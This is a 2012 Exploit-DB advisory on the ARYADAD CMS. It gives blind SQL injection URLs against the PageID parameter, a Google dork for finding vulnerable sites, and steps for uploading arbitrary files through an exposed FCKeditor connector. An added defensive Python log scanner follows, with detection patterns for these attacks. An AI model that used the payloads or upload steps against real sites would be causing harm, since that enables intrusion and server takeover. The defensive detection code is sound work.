ARYADAD - Multiple Vulnerabilities

EDB-ID: 18405
Platform: ASP
Date: 2012-01-21

# 
# Title     : ARYADAD Multi Vulnerability
# Author    : Red Security TEAM
# Date      : 21/01/2012
# Vendor    : http://cms.aryadad.com/
# Tested On : Windows Server 2008 (IIS 7.5)
# Dork      : Powered by ARYADAD Corporation
# Contact   : Info [ 4t ] RedSecurity [ d0t ] COM
# Home      : http://RedSecurity.COM
#
# Exploit   :
# 
# I         : Blind SQL Injection Vulnerability
# True      : http://server/Default.aspx?PageID=117' and 1-1 = '0
# False     : http://server/Default.aspx?PageID=117' and 2-1 = '0
#
# II        : File Upload Vulnerability
# 1. Go to  : /FA/fckeditor/editor/filemanager/connectors/test.html
# 2. Set Connector to ASP.Net and upload your file. You can see your uploaded files in FA/userfiles/file/
#
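
Added example, not part of the original advisory or the vendor's code: a log check a site operator could run over IIS W3C logs to find requests matching the two issues above. The log lines are constructed, and the script-extension list and the treatment of PageID as purely numeric are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Paths taken from the advisory; compared in lower case because IIS paths are case-insensitive.
CONNECTOR_DIR = "/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/fa/userfiles/file/"
# Assumption: extensions IIS/ASP.NET would execute rather than serve as data.
SCRIPT_EXT = (".asp", ".aspx", ".ashx", ".asmx")

# Constructed sample in IIS W3C extended format (documentation-range addresses).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2012-01-21 10:00:01 GET /Default.aspx PageID=117 192.0.2.10 200
2012-01-21 10:00:05 GET /Default.aspx PageID=117'+and+1-1+=+'0 198.51.100.7 200
2012-01-21 10:00:09 GET /FA/fckeditor/editor/filemanager/connectors/test.html - 198.51.100.7 200
2012-01-21 10:01:00 GET /FA/userfiles/file/report.pdf - 192.0.2.10 200
2012-01-21 10:01:30 GET /FA/userfiles/file/sample.aspx - 198.51.100.7 200
"""

def parse_w3c(text):
    """Yield one dict per request, using the log's own #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def classify(entry):
    """Return the reasons (possibly none) a request deserves review."""
    stem = entry["cs-uri-stem"].lower()
    query = entry.get("cs-uri-query", "-")
    reasons = []
    if query != "-":
        for key, value in parse_qsl(query, keep_blank_values=True):
            # Assumption: PageID is a numeric page key in normal traffic.
            if key.lower() == "pageid" and not re.fullmatch(r"[0-9]+", value):
                reasons.append("non-numeric PageID")
    if CONNECTOR_DIR in stem:
        reasons.append("FCKeditor connector path requested")
    if UPLOAD_DIR in stem and stem.endswith(SCRIPT_EXT):
        reasons.append("script requested from upload directory")
    return reasons

def scan(text):
    """Return (client IP, URI stem, reasons) for every flagged request."""
    return [(e["c-ip"], e["cs-uri-stem"], r)
            for e in parse_w3c(text) if (r := classify(e))]

if __name__ == "__main__":
    for ip, stem, reasons in scan(SAMPLE_LOG):
        print(ip, stem, "; ".join(reasons))
```

Any hit on the connector path from outside the site's editors, or a script served from the upload directory, is worth correlating with the preceding requests from the same client address.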